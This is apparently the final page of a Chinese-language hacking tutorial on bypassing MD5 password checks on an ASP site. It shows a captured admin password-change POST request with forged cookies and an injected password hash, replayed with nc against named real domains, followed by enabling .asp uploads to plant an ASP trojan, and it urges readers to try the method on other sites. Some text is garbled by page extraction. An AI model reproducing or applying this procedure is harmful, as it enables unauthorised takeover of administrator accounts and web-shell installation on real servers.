绕过md5验证继续入侵

好了，现在在浏览器上输入

    这样的目的是抓到的包等一下可以直接提交给真实的服务器一样（可以在后台改，fullname是管理员的全名）。" target=http://lovefree.org/wenzhang/wenzhang地址，不需要修改包的大小，而为了保证大小一样，在我们机子上的username=admin,fullname=doudou，也设置的和远程服务器一样（可以在后台改，fullname是管理员的全名）。

    一切就绪，现在开始再抓一次修改密码的包，为了方便起见我已经把管理员信息改为username=admin,fullname=doudou了，剩下包里需要修改的信息，就是md5的密码值，因为md5加密后都是16位的，不影响包大小。

---------------------------------------------------------------------------------------

POST /admin/saveedit.asp?id=1 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint,


application/msword, application/x-shockwave-flash, */*

Referer: _blank>http://www.xijing.com.cn/admin/useredit.asp?id=1

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)

Host: www.xijing.com.cn

Content-Length: 110

Connection: Keep-Alive

Cache-Control: no-cache

（下面是coocike验证内容）

Cookie: NB796459377Vote1=1; ASPSESSIONIDQSTCRBQS=MGCLHDBBGDELLJGJGJHGKBML; reglevel=; fullname=doudou; KEY=super; UserName=admin; purview=99999; Passwd=24a2b13f36f9f99c

（下面是修改信息）

username=admin&passwd=abend&passwd2=abend&fullname=doudou&depid=10&oskey=super&shenhe=1&cmdok=+%D0%DE+%B8%C4+

---------------------------------------------------------------------------------------

    看到了，包和真的一样！简直就像从他的服务器上抓来的。这样我们要改的，就只有passwd的md5值了，就是说，只要这个也匹配，真正的lovefree.org服务器就会认可。改为24a2b13f36f9f99c就是注入得到的密码md5值。现在把host文件的内容改回来，改回来之后，再输入域名lovefree.org就是打开真实地址了。用nc提交（图6）

    哈哈！恭喜您!您的资料已经修改成功! 2秒钟后返回上页!

    现在密码就是abend。用它来登录后台，到网站属性改"上传文件类型："多加一个asp，就可以上传asp木马。

    就针对尘缘雅境来说，虽然大家可能没我那么幸运，刚好有个readnews1.asp文件没加过滤，但是如果不小心拿到了数据库，也不至于看着md5发愁了吧？其实还有很多程序都存在这样的问题，如果你拿到了某站管理员的md5值，不妨用这种方法试一下，也许有很大收获！

上一页  [1] [2] [3]